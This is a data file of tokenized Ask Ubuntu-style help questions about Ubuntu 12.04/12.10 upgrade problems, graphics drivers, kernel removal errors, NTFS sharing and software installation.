203418	lost unity taskbars and window frames after upgrading from 12.04 lts on a dell precision m4600 nvidia	i just upgraded from 12.04 lts . the upgrade went fine until the moment , while still installing packages , all the unity taskbars and window frames went away . i could do nothing more but observe the installation progress ( the only app i had running was chrome but it hanged , and because of lack of taskbars i could n't restart it ) . but installation finished successfully and it asked for reboot . after rebooting , it booted into some low-res mode , displayed a message box that it ca n't detect my video drivers correctly and apparently i could n't do anything - there were no reaction to mouse nor keyboard . oh . however , i noticed in the logs that while booting , it started that bumblebee optimus thing . i had optimus disabled , so i went to bios and enabled it . i also managed to get into text console ( framebuffer ) and changed grub settings to boot straight into text mode . now i tried starting x server manually ( startx ) and it showed me the high-res desktop , started two apps that i had in autostart , mouse and keyboard were fine . but no taskbars and no window frames . the screen resolution was fine ( 1920x1080 ) and looked like nvidia drivers booted properly . the next thing i tried was uninstalling nvidia-current-updates , uninstalling bumblebee-nvidia , and setting xorg.conf driver to vesa and then nouveau . in both cases , i got low-res desktop with no damn taskbars nor frames . so then i installed only nvidia-current-updates ( installation went fine ) - i got back nvidia drivers working ( logs and splash screen confirmed it ) , high-res desktop , but of course still with no unity taskbars . the last thing i tried was removing .compiz and .config/compiz directories from my home folder , as i read such advice on the internet . did n't work . also creating a fresh user account and starting x from there - showed only empty desktop , no taskbars . now i 'm stuck . seems the damn thing does n't work at all . i have to get it somehow working by monday . please help me what can i do to : fix it debug it and fix it workaround it , at least so i can make some work while still trying to fix it later - i was thinking of installing a different graphic shell , but i do n't know which are usable with ubuntu downgrade to ubuntu 12.04 ( but really do n't want to do that ) my hardware : dell precision m4600 i7 core quad , 24 gb ram nvidia quadro 1000m ubuntu installed kernel 3.5.0-17 . thanks a lot , piotr
203421	how to manage many pictures both on pc as on external hard drives ?	i 'm using darktable to edit and rate my pictures . however at some point the folders need to be moved to an external hdd . how do you manage that ? it would be great to be able to search for tags ( maybe thumbnails ) of the pictures located externally .
203423	ubuntu 12.10 final not booting	last day i installed new ubuntu 12.10 64bit in my lenovo g580 having 3rd gen intel ci5 processor with intel hd 4000 graphics card . after installing brightness control is not working , it always holds the max brightness all the time . after updating the system , it does not boot anymore it stuck at black screen , while issuing the cltr+alt+f1 i am getting the console mode and i can login there , but the problem is graphical mode is not coming . any idea how to fix this ? ? ? thanx , gob
203424	sharing ntfs on start-up	after much digging around i 've found a way to share my ntfs drives , but i do n't know how to do it so it will still remain active after i restart the computer . this is the method i currently use : first , i unmount the drive ( since ubuntu mounts it on start-up ) then i open the terminal and use the following command : sudo /sbin/mount.ntfs /dev/sdc1 /media/expansion -o rw , auto , user , fmask=0111 , dmask=0000 then finally , if necessary , i start a share manually using the gui and tick the 'guest access ' box . this stage is usually not necessary . this method works for me , but i have to do it every time after i restart the computer . i think the only problem is that the mount on start-up does not set ntfs permissions to grant access from the network , and the command i use does ( i do n't understand the command , i copy pasted it from a forum post and edited it to my needs , and i 'm guessing 'fmask=0111 ' or 'dmask=0000 ' gives the permissions ) i 'm thinking of adding a shell script with this command to /etc/init.d but i fear that might not be a very 'neat ' way to do it . also , i will need to find a way to deactivate whatever mounts the drive currently on-startup . any help or better ideas ?
203428	how do i install the original gnome-control-center ?	how can i install in the gnome-shell in ubuntu 12.10 the original gnome-control-center ( ppa , package ) . in ubuntu have it on version of the gnome-control-center . i mean the control-center from fedora , gnome-live cd ...
203429	how to install nvidia driver in ubuntu 12.10 ?	i 've downloaded `` nvidia-linux-x86-304.60.run '' from nvdia website ... tried to execute it in command promptmode ( grub boot menu -- > ubuntu advanced options ) but the filesystem is read only so the installer failed . how to make the filesystem r/w ? ? ?
203432	logitech dinovo edge bluetooth dongle stop working after upgrade to 12.10	i upgraded from 12.04 to 12.10 on my desktop . my bluetooth dongle does not get detected after the upgrade , which was working fine before . i tried another dongle of another brand and that works . but i want to use the old one as that is good quality one that comes with logitech dinovo keyboard .
203433	how to control an ubuntu pc from another ubuntu pc over internet , using mobile broadband connections ?	there are two ubuntu pcs called a and b . a and b are connected to the internet using two separated internet connections . ( in my case , two mobile broadband connections ppp0 x2 ) each connection has a unique & static public ip address . what i need is to control a computer 's cursor , using b computer 's mouse , over the internet . in both computers , i have allowed other users to control my computer in desktop sharing preferences , as below : when i try to connect to a from the b using remmina remote desktop client , it refuses to connect after trying for a while . these are my settings : i expect this to be done from an available open source software , not from teamviewer . i found this guide harder to understand . please provide me clear instructions ... thanks for having a look !
203436	i lost my admin pass for ubuntu 12.04	i allowed root login , then tried to disable it , it would n't let me log into my administrator account , it would take me to a black page then go right back to the loging page , then i tried to reset the admin pass by dropping ot the shell prompt thing , and it asked for the root pass , i entered it like it always was , but it did n't work . please if you could help me i would be pleased . thanks !
203438	after installing nvidia-current via jockey on 12.10 i only see my desktop but not the unity interface	i also tryed to install via the x-swat ppa but there are no quental packages yet . how can i install nvidia-current
203441	x crash at login for 1 user	user switching was n't working on my 12.04 lts desktop ( just dropped me to tty8 with a blinking cursor ) so i tried to manually start a second x session by logging in to tty6 and running startx -- :1 . this did n't work either , and my machine locked up . now when i try to log in as the second user from lightdm , x instantly crashes and i 'm thrown back to the login screen . other accounts on the machine work fine , and it happens for every desktop environment . i 've had a poke around in my home directory , but i ca n't see anything obvious to change/delete to get it working again . can anyone advise please ?
203442	installing ubuntu 12.10 to mac mini 2011	i 'd like to try installing ubuntu onto my mac mini 2011 but i have a few reservations . the b43-fwcutter drivers need to be installed via offline since i ca n't ethernet . i 'm worried if i wipe the os x partition my mac wo n't boot to ubuntu and will need to go to 'recovery ' . any suggestions ?
203446	the eclipse application icon is huge in unity 's dash	i have a problem with the manual installation of eclipse juno . after unpacking the tarball to /opt , adding a symlink from /usr/local/bin and adding the following to a new file /usr/share/applications/eclipse.desktop : [ desktop entry ] version=1.0 name=eclipse genericname=integrated development application comment=eclipse juno exec=/usr/local/bin/eclipse tryexec=/usr/local/bin/eclipse icon=/opt/eclipse/icon.xpm terminal=false type=application categories=development ; ide ; i still get this weird behavior from the dash : eclipse runs just fine and the icon is clickable but as you can see the size is a bit off . how can i fix this ? should n't unity automatically scale the icon ?
203448	why do ubuntu releases use names and not just numbers ?	as the title says - why also use names and not just version numbers ?
203449	unhandled event loop exception `` unknown mozilla path '' with eclipse 3.7.1	i installed the tizen sdk 2.0 which uses eclipse 3.7.1 as an ide on ubuntu 12.10 64bit . when trying to create a tizen web project i got the following error message from eclipse : unhandled event loop exception no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] the problem is that eclipse is configured to use xulrunner as a headless browser inside the ide . xulrunner is not in the repositories for ubuntu 12.10 any more , therefore eclipse is not able to find the libraries .
203454	iso download fails ubuntu server 12.04.1 lts 32bit	i have tried downloading ubuntu server 12.04.1 lts 32bit but it fails at 156.790kb image file at start of download says 645mb it will only download 156.790kb then finishes . where can i download this image to receive the full download ? i have tried to download it in different browsers same problem .
203465	ubuntu 12.04/12.10 keeps on freezing	since i installed ubuntu 12.04 it keeps on freezing . it happens on different pcs and i do n't think it 's a memory problem . for example , i recently got a laptoptop with 8gb of ram and i got the problem there as well . the only solution is unplugging the machine or pressing +reisub ( i found this magic spell in a related thread ) . the problem seems to be triggered by a task switch , e.g . when i press , which moves guake to the background or into the forground or when i press , which switches the current gui task . i am suspecting guake , chrome , or evince are possible causes of the problem . having said that , i disabled guake on the laptop and i got the prblem once since then . i just reinstalled 12.10 and i had 3 freezes in 10 minutes . i was n't doing anything special . the only thing i was doing was running chrome and gimp . btw 12.10 also causes other problems , like not properly showing the menu bar at the top of the window . when i 'm running chrome and gimp , the pulldown menus do n't show properly . for example , they may have broad diagonal lines with awkward colours such as yellow and blue . the following is an example of another problem with the file menu : any help would be greatly appreciated .
203466	no permission to suspend/hibernate after upgrading to 12.10	after upgrading to ubuntu 12.10 , when i click on suspend/hibernate in the menu , nothing happens . when i run pm-hibernate or pm-suspend in the terminal , i was told that i need to be root to use them . of course , sudo pm-hibernate and sudo pm-suspend can work . how do i get the hibernate/suspend buttons in my menu to work again ?
203470	problems with software sources -- i tried to add a repository and it failed . how do i fix it ?	as in the title . i tried to add a repository , how do i remove it . it wo n't let me via the software-sources program . i tried sudo ppa-purge ppa : quantal ( the name of it ) and it failed anyone got any ideas ? deb http : //archive.ubuntu.com/ubuntu/ quantal main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu/ quantal main restricted universe multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu/ quantal-security main restricted universe multiverse deb-src http : //security.ubuntu.com/ubuntu/ quantal-security main restricted universe multiverse # added by software-properties deb http : //archive.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu/ quantal-updates main restricted universe multiverse # added by software-properties deb http : //launchpad.net/ubuntu/quantal/amd64/ quantal deb-src http : //launchpad.net/ubuntu/quantal/amd64/ quantal
203472	ubuntu for android and ubuntu tv	does someone know when the distros ubuntu for android and ubuntu tv will get final ? i think this would be great products and i no more want to wait for them .
203473	ca n't get grooveshark webapp to work	i just upgrade to 12.10 and i was thrill to use webapps , specially grooveshark 's . so i went to the website , click `` integrate '' and ... nothing . no icon on my dash , no controls on my sound notification panel . did i do something wrong ? how can i get it working ?
203475	how can i make fonts in the top panel smaller ?	i can use ubuntu tweak to change font size on the background but i ca n't change this : can anyone help ?
203479	how to set ubuntu 12.04 to it 's factory settings like when u first installed it ?	well , this is a simple answered question , from the title , but my real problem is hard af . i have set ubuntu to use root , then it would n't let me log into the admin account only root and guest i deleted the admin account , remade another , then attempted to disable root account . this failed - i messed up the password , the original password was `` root '' i also did n't set a password for my new admin account , so it says it has one , whats the default password for it ? i ca n't moderate my ubuntu system at all now . i have tried to drop to cmd shell thing , it asks for the root password , i type 'root ' and any other possible passwords , it does n't work . to reset ubuntu to factory settings i have found that i could enter the following code : sudo dpkg-reconfigure -phigh -a sudo requires admin password , that i cant find out without root password and i don ; t know . my goal is to try to fix this without remaking a bootable usb for ubuntu , because i lost the one i made for this . so if i ca n't , please say so . if you can help thanks !
203482	tool or command to move multiple files from multiple folders into one place ( without overwriting )	i am currently working on recovering some logfiles from random backups that i made . i have 48 files in 70+ folders . how can i move these 48 files into one folder , without overwriting files with the same name ? most of these files have the same name , but different size , i checked with fdupes .
203486	reliance netconnect in ubuntu 12.04	i have a reliance zte modem and i am not able to connect it in ubuntu . ( i have tried most of the methods which come when i search in google . they did n't work ) . please help.. ( remember i am using ubuntu 12.04 and not any older version )
203489	did the upgrade kill my computer , or is this just a horrible coincidence ?	i have a laptop that i have used for many years , and it has had ubuntu on it since maybe version 8.04 or so . this morning i upgraded from 12.04 to 12.10 . the upgrade process went perfectly smoothly until it rebooted . now , when the computer boots , it goes into some kind of memory test , and never reaches grub . on the one hand , it would seem that this is a hardware memory failure , and nothing to do with the operating system . on the other hand , i ca n't shake the feeling that it seems the timing is more than just coincidental . if my memory were as cataclysmically faulty as it now appears , i 'm sure i would have seen some problems before today . in my experience , memory tends to start failing bit by bit , not all at once like this . is it just a horrible coincidence , or is there anything about an os that can impact or trigger a problem like i 'm seeing ? i 've tried rebooting , but it will not get past the memory test . the memory test itself seems to go on indefinitely . it 's been over 24 hours and it 's still going .
203492	can i run the webapps independently from the browser ?	i was wondering if it is possible to run a webapp without it opening the browser . for example i have pinned the facebook webapp to my launcher , but when i click on it , it opens the browser and starts the integration with facebook . i just want it to start the integration and not open www.facebook.com in my browser . is it possible ?
203494	how to write bash script what is the command to open a terminal with two different tabed terminals and execute some commands separately tabs ?	how to write bash script to open a terminal with two tabs , and execute commands in both tabs ? for instance : tab 1 opens skype tab 2 opens chromium-browser in the end , i want one more thing : write a bash script with my skype username and password and feed those to skype . thanks
203497	why ca n't i install the nvidia 304.60 driver in ubuntu 12.10 amd64 ?	i ca n't install the nvidia driver in ubuntu 12.10 . the following error appears after i issue the command sudo apt-get install nvidia-current nvidia-settings after adding the nvidia ppa : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : is there any solution ?
203500	nvidia graphics card not shown in additional drivers in software sources	i do n't have my nvidia 8400gm graphics card included in additional drivers in ubuntu 12.10 64bit . previously it was working fine on ubuntu 12.04 lts 64bit . here is the screenshot
203507	can not install g++ on 12.10	sudo apt-get install g++ reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : g++ : depends : g++-4.7 ( > = 4.7.0-1~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
203513	which linux distribution and environment displayed in the screenshot ?	i found this picture on owncloud and i wonder what linux distrbution / desktop environment it was made on . i see there 's google chrome and it looks like mac os x , but what is it ?
203520	how to seed a complete torrent	i have a .iso file and i am keen on to seed it . also i have the related torrent file ! which torrent client could do this ?
203523	no menu bar after upgrading to 12.10	this morning i upgraded to ubuntu 12.10 from 12.04 . during the login ( startup ) screen everything is working as it should be . after i login the menu bar on top disappears and all i see is the background image . i 'm using a samsung rc730 laptop with an intel hd graphics card & a nvidia gt540m which in windows switches automaticly using optimus . i 'm running the ubuntu 12.10 ( 64 bits version ) and i can open the terminal after logging in . i 'm a new user to ubuntu so step-by-step help would be appriciated .
203525	how to install dropbox in 12.10 ?	i have tried installing dropbox via their website ( the .deb file ) , using wget , and adding their repo , and every method has failed . how can i get it to work like it did in 12.04 ? i have a clean install on my system , so it 's nothing from 12.04 conflicting with it .
203529	windows 7 not loading after installing ubuntu 12.10	i installed ubuntu 12.10 along side with windows . after restarting my laptop in grub it is showing 'windows 7 ( loader ) ' but an error is occurred while loading . my ubuntu 12.10 is working great . can any help me out with my problem .
203536	how to install a brother dcp-135c printer ?	recently moved over onto ubuntu . first time for anything like this for me as i 'm coming from windows but i 'm here and ready to learn . the only problems ive experienced so are saving in libre office doc as a word doc file and then losing the formatting upon receival via email . however the more pressing issue is getting my old brother dcp 135 c to work . ive scanned a few help blogs and have found them frankly quite frightening . would it be possible for someone to write u a step by step guide ( including explanations of terminology ) for those of us new to this magic world ?
203537	chrome in ubuntu 12.10	it seems like chrome is n't ready for ubuntu 12.10 yet , as you get the error when trying to install it , should i install chromium instead , or just stick with firefox for a bit ? the only problem is , i like using the chrome web apps . i have a nice clean install of 12.10 , and do n't want to mess it up with some dodgy installs already .
203539	where on the launchpad page given in the description is the ppa of openoffice that i need to add to get the repository ?	https : //launchpad.net/ubuntu/quantal/amd64/openoffice.org/1:3.3.0-7ubuntu7 please help me i 've spent hours trying to figure out how to install openoffice on quantal ubuntu 12.10 and it is driving me nuts !
203542	not able to set up gwibber online accounts	i first tried ubuntu 12.10 from the live usb and then eith virtual box . in both cases i was able to connect to my google account from gwibber . but now i have done a clean install , but am not able to connect at all . i get a rotating circle , which just keeps on going . i am using a proxy server whose details i have given in the network proxy settings . i have also set up the http_proxy , https_proxy and ftp_proxy variables .
203543	ca n't remove kernels `` run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 ''	yesterday i upgraded ubuntu from 12.04 to 12.10 . however , the linux kernel has not upgraded from 3.2 to 3.5 as i would have expected . $ uname -r 3.2.0-32-generic $ uname -a linux tony-b 3.2.0-32-generic # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ cat /proc/version linux version 3.2.0-32-generic ( buildd @ batsu ) ( gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) ) # 51-ubuntu smp wed sep 26 21:33:09 utc 2012 not sure why that happened there . i wanted to install audacity ( v2.0.1-1_amd64 ) to edit a lecture audio file . when trying this operation through ubuntu software center , it says that to install audacity , four items will need to be removed : linux-image-3.2.0-27-generic linux-image-3.2.0-29-generic linux-image-3.2.0-30-generic linux-image-3.2.0-31-generic so i click `` install anyway '' but it fails with the following output : installarchives ( ) failed : ( reading database ... ( reading database ... 259675 files and directories currently installed . ) removing linux-image-3.2.0-27-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-27-generic /boot/vmlinuz-3.2.0-27-generic update-initramfs : deleting /boot/initrd.img-3.2.0-27-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-27-generic /boot/vmlinuz-3.2.0-27-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-27-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-27-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already removing linux-image-3.2.0-29-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-29-generic /boot/vmlinuz-3.2.0-29-generic update-initramfs : deleting /boot/initrd.img-3.2.0-29-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-29-generic /boot/vmlinuz-3.2.0-29-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-29-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-29-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already removing linux-image-3.2.0-30-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-30-generic /boot/vmlinuz-3.2.0-30-generic update-initramfs : deleting /boot/initrd.img-3.2.0-30-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-30-generic /boot/vmlinuz-3.2.0-30-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-30-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-30-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already removing linux-image-3.2.0-31-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-31-generic /boot/vmlinuz-3.2.0-31-generic update-initramfs : deleting /boot/initrd.img-3.2.0-31-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-31-generic /boot/vmlinuz-3.2.0-31-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-31-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-31-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-27-generic linux-image-3.2.0-29-generic linux-image-3.2.0-30-generic linux-image-3.2.0-31-generic error in function : setting up grub-pc ( 2.00-7ubuntu11 ) ... /usr/sbin/grub-bios-setup : warning : sector 32 is already in use by the program `flexnet ' ; avoiding it . this software may cause boot or other problems in future . please ask its authors not to store data in the boot track . installation finished . no error reported . generating grub.cfg ... dpkg : error processing grub-pc ( -- configure ) : subprocess installed post-installation script returned error exit status 1 it seems i need to remove the old linux images somehow . i have tried this through ( 1 ) synaptic , ( 2 ) ubuntu tweak , and ( 3 ) computer janitor . the first two fail , whilst computer janitor wo n't even open . the output from synaptic is : e : linux-image-3.2.0-27-generic : subprocess installed post-removal script returned error exit status 1 e : linux-image-3.2.0-29-generic : subprocess installed post-removal script returned error exit status 1 e : linux-image-3.2.0-30-generic : subprocess installed post-removal script returned error exit status 1 e : linux-image-3.2.0-31-generic : subprocess installed post-removal script returned error exit status 1 $ dpkg -- list | grep linux-image rh linux-image-3.2.0-27-generic 3.2.0-27.43 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp rh linux-image-3.2.0-29-generic 3.2.0-29.46 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp rh linux-image-3.2.0-30-generic 3.2.0-30.48 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp rh linux-image-3.2.0-31-generic 3.2.0-31.50 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-32-generic 3.2.0-32.51 amd64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.5.0-17-generic 3.5.0-17.28 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-extra-3.5.0-17-generic 3.5.0-17.28 amd64 linux kernel image for version 3.5.0 on 64 bit x86 smp ii linux-image-generic 3.5.0.17.19 amd64 generic linux kernel image but trying to remove using the command line fails too e.g . : $ sudo apt-get purge linux-image-3.2.0-27-generic reading package lists ... done building dependency tree reading state information ... done the following packages will be removed linux-image-3.2.0-27-generic linux-image-3.2.0-29-generic linux-image-3.2.0-30-generic linux-image-3.2.0-31-generic 0 upgraded , 0 newly installed , 4 to remove and 1 not upgraded . 5 not fully installed or removed . after this operation , 597 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 259675 files and directories currently installed . ) removing linux-image-3.2.0-27-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-27-generic /boot/vmlinuz-3.2.0-27-generic update-initramfs : deleting /boot/initrd.img-3.2.0-27-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-27-generic /boot/vmlinuz-3.2.0-27-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-27-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-27-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports has already been reached removing linux-image-3.2.0-29-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-29-generic /boot/vmlinuz-3.2.0-29-generic update-initramfs : deleting /boot/initrd.img-3.2.0-29-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-29-generic /boot/vmlinuz-3.2.0-29-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-29-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-29-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports has already been reached removing linux-image-3.2.0-30-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-30-generic /boot/vmlinuz-3.2.0-30-generic update-initramfs : deleting /boot/initrd.img-3.2.0-30-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-30-generic /boot/vmlinuz-3.2.0-30-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-30-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-30-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports has already been reached removing linux-image-3.2.0-31-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-31-generic /boot/vmlinuz-3.2.0-31-generic update-initramfs : deleting /boot/initrd.img-3.2.0-31-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-31-generic /boot/vmlinuz-3.2.0-31-generic generating grub.cfg ... run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.2.0-31-generic.postrm line 328. dpkg : error processing linux-image-3.2.0-31-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports has already been reached errors were encountered while processing : linux-image-3.2.0-27-generic linux-image-3.2.0-29-generic linux-image-3.2.0-30-generic linux-image-3.2.0-31-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i remove old kernel images which refuse to be removed ?
203544	software updater crashes in 12.10 beta2	i try to update from ubuntu 12.10 beta2 to 12.10 , using the software updater , but it tells me every time , i try to load the program , that it `` failed to download repository information '' . what should i do , to get the software updater running ?
203552	quantal upgrade broke my gnome-shell !	just updated to quantal 12.10 , and unity works fine , but and i ca n't get gnome-shell to work : ( some symptoms : when using gdm as the default , it decided to display everything in chinese . when attempting to log in , it accepts the password , and then seems to crash when trying to load my desktop , and seems to restart gdm and send me back to the login screen when switching to lightdm as the window manager , it gets a little further ( and in english ) , bringing up a desktop , but a broken one -- the propeller key does n't bring up a menu , there 's no menubar or notifactions area . i can do a few things , like bring up a terminal with ctrl+alt+t , and launch eg firefox from there , but not much else . i have tried uninstalling gnome-shell , deleting /etc/gdm , and reinstalling any other suggestions ? which log files to look at for example ?
203554	dell vostro 3360 laptop gets warm after 12.10 upgrade	after my yesterday upgrade to ubuntu 12.10 my laptop ( dell vostro 3360 ) gets warm without the cpu fan cooling at all . at 75째 c the fan seems to be off . this will result in serious problems wen running heavier processes such as video production . any suggestions what i can do to solve this ? thanks : )
203556	how to edit the text of the grub menu 's options ?	every grub menu have its options written is english and i would like to translate it to portuguese . so , this is the question , how to edit the text of the grub menu 's options ? for example the 12.10 grub 's menu is something like that : ubuntu advanced ubuntu options my objective is to translate it to : ubuntu opções avançadas do ubuntu
203560	building sane from git-source produce backend missmatch on 12.04 even if built locally	it seems to me that with ubuntu precise pangolin it is all but easy to do a proper install of sane from source ( git-repo ) . i 've found other scanning issues trying to find an answer to this , where the output people posted seems to indicate they suffer the same issue ( unknowingly ) . if i run on a fresh install of ubuntu 12.04 with compiled sane source from the git i get : $ scanimage -v scanimage ( sane-backends ) 1.0.24git ; backend version 1.0.22 ( i basically followed the instructions on http : //ubuntuportal.com/2012/02/how-to-get-an-canon-canoscan-lide-100-scanner-to-work-in-ubuntu-11-10linux-mint-12.html since i did n't find any other information making sure that sane was not installed prior to installation . ) my primary interest is the epson2-backend . in 1.0.22 it offers the wrong tpu settings for epson v700 ( tpu2-mode was n't supported in 1.0.22 , and the scanner is useless to me if i do n't have the tpu2-support ) . since if i ask it to enter transparency mode , it shows 1.0.22 behaviour , it implies that the epson2-backend comes from 1.0.22 and not 1.0.24 even though i just built it . if i install sane with prefix to a local folder and run that version of scanimage it still produces the mismatch . however , on another computer where i installed a custom 1.0.22 build of sane prior to upgrading to ubuntu 12.04 , i can build and install the same sane-git locally and have it correctly match backends : $ ./sane/bin/scanimage -v scanimage ( sane-backends ) 1.0.24git ; backend version 1.0.24 $ scanimage -v scanimage ( sane-backends ) 1.0.22 ; backend version 1.0.22 on this computer the 1.0.24 works correctly in finding tpu2 on epson v700 . so what am i missing/doing wrong ? ( and i want to replace 1.0.22 with 1.0.24 for the whole system , the local build was just debugging . ) any help would be much appreciated . edit 1 : just tried compiling sane using this instruction on ubuntu 10.04 and it worked like a charm . however , when i upgraded to 12.04 ( really would like to run 12.04 ) , sane was downgraded to 1.0.22 . when trying the same set of instructions on 12.04 i was still out of luck -- the backend missmatch was there again ( and i do have libusb-dev installed ) edit 2 : i updated to ubuntu 12.10 which now has the 1.0.23 sane drivers . i have n't dared trying to compile from source on 12.10 since 1.0.23 is good enough for me . this is just a work-around and i would still like to know what 's up with ubuntu 12.04 . edit 3 : tried building sane on 12.10 both using the above ubuntu-guide and building to a local directory . both attempts produced backend miss-match .
203562	wireless disabled by hardware switch ( another )	one day when i was trying to connect with wireless i found it did n't work.it said : wireless is disabled by hardware switch i 'd found some questions similar to mine , so i tried some suggestion as following : ~ $ rfkill list 0 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 1 : phy0 : wireless lan soft blocked : yes hard blocked : yes so i typed : sudo rfkill unblock all then i got : rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : yes but the wireless still did n't work . i 'm sure wireless lan is enabled in bios and the hardware switch is turned on ( a small switch on the front side of my laptop ) . also fn+f3 or fn+f5 did n't work . i was in ubuntu 12.04 and i thought it might be a system problem , but when i started my laptop with ubuntu 12.10 installation disk , this problem still exits .
203566	package ubuntu-release-upgrader does not exist	i get this error when i tried to upgrade ubuntu 12.04 to 12.10 from update manager . package ubuntu-release-upgrader does not exist does anything can be done to fix this ?
203568	picasa on wine didnt create an icon ( 12.10 ) , how to start it ?	i have just installed picasa using sudo apt-get install wine winetricks cd ~/ & & wget http : //dl.google.com/picasa/picasa39-setup.exe wine ~/picasa39-setup.exe it is installed , because i can start it from the shell . how can i add an icon to the dash to easily start picasa in ubuntu 12.10 ( as i had in 12.04 ) ?
203569	where does unity store app shortcuts and how to get rid of nonfunctional/duplicate shortcuts ?	i have lots of duplicate icons ( with different sizes ) , or even icons without title in my dash . i want to get rid of those , but do n't know how . i have observed , that when logging in as a different user , everything is alright . where does unity store all those app icons ? it has to be somewhere below my home folder , since everythings alright for other accounts . but alas , i have n't found it . already tried running unity -- reset , just be informed that it 's deprecated and does n't work any more . i am know on 12.10 , but had the same problem in 12.04 . edit : i made a screenshot to make my problem clear :
